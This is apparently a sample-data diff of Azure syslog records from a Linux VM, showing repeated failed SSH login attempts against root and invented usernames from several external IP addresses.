+13326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:37:59,UbuntuDevEnv,2019-06-26 04:37:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:01,UbuntuDevEnv,2019-06-26 04:38:00,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 15465 ssh2,129530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15465,,
+13328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:03,UbuntuDevEnv,2019-06-26 04:38:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 15465 ssh2,129530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15465,,
+13329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:10,UbuntuDevEnv,2019-06-26 04:38:10,auth,UbuntuDevEnv,info,Invalid user glance from 5.135.161.72 port 35454,129583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,glance,5.135.161.7,35454,,
+13330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:10,UbuntuDevEnv,2019-06-26 04:38:09,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 15465 ssh2],129530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15465,,
+13331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:10,UbuntuDevEnv,2019-06-26 04:38:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,129583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+13332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:10,UbuntuDevEnv,2019-06-26 04:38:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:12,UbuntuDevEnv,2019-06-26 04:38:11,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 15465 ssh2,129530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15465,,
+13334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:12,UbuntuDevEnv,2019-06-26 04:38:12,auth,UbuntuDevEnv,info,Failed password for invalid user glance from 5.135.161.72 port 35454 ssh2,129583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,glance,5.135.161.7,35454,,
+13335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:12,UbuntuDevEnv,2019-06-26 04:38:12,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 35454:11: Bye Bye [preauth],129583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,35454,,
+13336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:12,UbuntuDevEnv,2019-06-26 04:38:12,auth,UbuntuDevEnv,info,Disconnected from invalid user glance 5.135.161.72 port 35454 [preauth],129583,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,glance,5.135.161.7,35454,,
+13337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:14,UbuntuDevEnv,2019-06-26 04:38:13,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 15465 ssh2,129530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15465,,
+13338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:14,UbuntuDevEnv,2019-06-26 04:38:13,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:14,UbuntuDevEnv,2019-06-26 04:38:13,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 15465 ssh2 [preauth],129530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,15465,,
+13340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:14,UbuntuDevEnv,2019-06-26 04:38:13,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:14,UbuntuDevEnv,2019-06-26 04:38:13,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 15465: Too many authentication failures [preauth],129530,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,15465,,
+13342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:17,UbuntuDevEnv,2019-06-26 04:38:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:19,UbuntuDevEnv,2019-06-26 04:38:18,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20730 ssh2,129603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20730,,
+13344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:21,UbuntuDevEnv,2019-06-26 04:38:21,auth,UbuntuDevEnv,info,Invalid user wf from 119.123.240.8 port 37265,129623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wf,119.123.240.8,37265,,
+13345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:21,UbuntuDevEnv,2019-06-26 04:38:21,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20730 ssh2,129603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20730,,
+13346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:21,UbuntuDevEnv,2019-06-26 04:38:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:21,UbuntuDevEnv,2019-06-26 04:38:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=119.123.240.8,129623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,119.123.240.8,,0,
+13348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:22,UbuntuDevEnv,2019-06-26 04:38:21,auth,UbuntuDevEnv,info,Invalid user rachel from 95.216.195.95 port 58924,129628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rachel,95.216.195.9,58924,,
+13349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:22,UbuntuDevEnv,2019-06-26 04:38:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:22,UbuntuDevEnv,2019-06-26 04:38:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=95.216.195.95,129628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.216.195.9,,0,
+13351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:23,UbuntuDevEnv,2019-06-26 04:38:23,auth,UbuntuDevEnv,info,Failed password for invalid user wf from 119.123.240.8 port 37265 ssh2,129623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wf,119.123.240.8,37265,,
+13352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:24,UbuntuDevEnv,2019-06-26 04:38:23,auth,UbuntuDevEnv,info,Received disconnect from 119.123.240.8 port 37265:11: Bye Bye [preauth],129623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,119.123.240.8,37265,,
+13353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:24,UbuntuDevEnv,2019-06-26 04:38:23,auth,UbuntuDevEnv,info,Disconnected from invalid user wf 119.123.240.8 port 37265 [preauth],129623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wf,119.123.240.8,37265,,
+13354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:24,UbuntuDevEnv,2019-06-26 04:38:23,auth,UbuntuDevEnv,info,Failed password for invalid user rachel from 95.216.195.95 port 58924 ssh2,129628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rachel,95.216.195.9,58924,,
+13355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:24,UbuntuDevEnv,2019-06-26 04:38:23,auth,UbuntuDevEnv,info,Disconnected from invalid user rachel 95.216.195.95 port 58924 [preauth],129628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rachel,95.216.195.9,58924,,
+13356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:24,UbuntuDevEnv,2019-06-26 04:38:23,auth,UbuntuDevEnv,info,Received disconnect from 95.216.195.95 port 58924:11: Bye Bye [preauth],129628,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,95.216.195.9,58924,,
+13357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:24,UbuntuDevEnv,2019-06-26 04:38:23,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 20730 ssh2,129603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20730,,
+13358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:32,UbuntuDevEnv,2019-06-26 04:38:31,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:32,UbuntuDevEnv,2019-06-26 04:38:31,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:32,UbuntuDevEnv,2019-06-26 04:38:31,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 20730 ssh2 [preauth],129603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20730,,
+13361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:32,UbuntuDevEnv,2019-06-26 04:38:31,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 20730 ssh2],129603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,20730,,
+13362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:32,UbuntuDevEnv,2019-06-26 04:38:31,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 20730: Too many authentication failures [preauth],129603,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,20730,,
+13363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:34,UbuntuDevEnv,2019-06-26 04:38:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:36,UbuntuDevEnv,2019-06-26 04:38:36,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 26575 ssh2,129669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26575,,
+13365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:44,UbuntuDevEnv,2019-06-26 04:38:42,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 26575 ssh2],129669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26575,,
+13366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:45,UbuntuDevEnv,2019-06-26 04:38:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 26575 ssh2,129669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26575,,
+13367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:50,UbuntuDevEnv,2019-06-26 04:38:50,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 26575 ssh2 [preauth],129669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26575,,
+13368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:50,UbuntuDevEnv,2019-06-26 04:38:50,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:50,UbuntuDevEnv,2019-06-26 04:38:50,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 26575: Too many authentication failures [preauth],129669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,26575,,
+13370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:50,UbuntuDevEnv,2019-06-26 04:38:50,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 26575 ssh2],129669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,26575,,
+13371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:50,UbuntuDevEnv,2019-06-26 04:38:50,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129669,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+13372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:53,UbuntuDevEnv,2019-06-26 04:38:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:38:55,UbuntuDevEnv,2019-06-26 04:38:54,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 32527 ssh2,129736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32527,,
+13374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:00,UbuntuDevEnv,2019-06-26 04:38:59,auth,UbuntuDevEnv,info,Invalid user pgadmin from 196.41.208.238 port 47665,129759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgadmin,196.41.208.2,47665,,
+13375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:00,UbuntuDevEnv,2019-06-26 04:38:56,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 32527 ssh2,129736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32527,,
+13376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:00,UbuntuDevEnv,2019-06-26 04:38:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,129759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+13377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:00,UbuntuDevEnv,2019-06-26 04:38:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,129759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+13378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:00,UbuntuDevEnv,2019-06-26 04:38:59,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 32527 ssh2,129736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32527,,
+13379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:01,UbuntuDevEnv,2019-06-26 04:39:01,auth,UbuntuDevEnv,info,Failed password for invalid user pgadmin from 196.41.208.238 port 47665 ssh2,129759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgadmin,196.41.208.2,47665,,
+13380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:01,UbuntuDevEnv,2019-06-26 04:39:01,auth,UbuntuDevEnv,info,Disconnected from invalid user pgadmin 196.41.208.238 port 47665 [preauth],129759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pgadmin,196.41.208.2,47665,,
+13381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:01,UbuntuDevEnv,2019-06-26 04:39:01,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 47665:11: Bye Bye [preauth],129759,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,47665,,
+13382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:02,UbuntuDevEnv,2019-06-26 04:39:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 32527 ssh2,129736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,32527,,
+13383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:08,UbuntuDevEnv,2019-06-26 04:39:08,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 32527: Too many authentication failures [preauth],129736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,32527,,
+13384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:08,UbuntuDevEnv,2019-06-26 04:39:08,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,129736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+13385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 04:39:08,UbuntuDevEnv,2019-06-26 04:39:08,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,129736,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
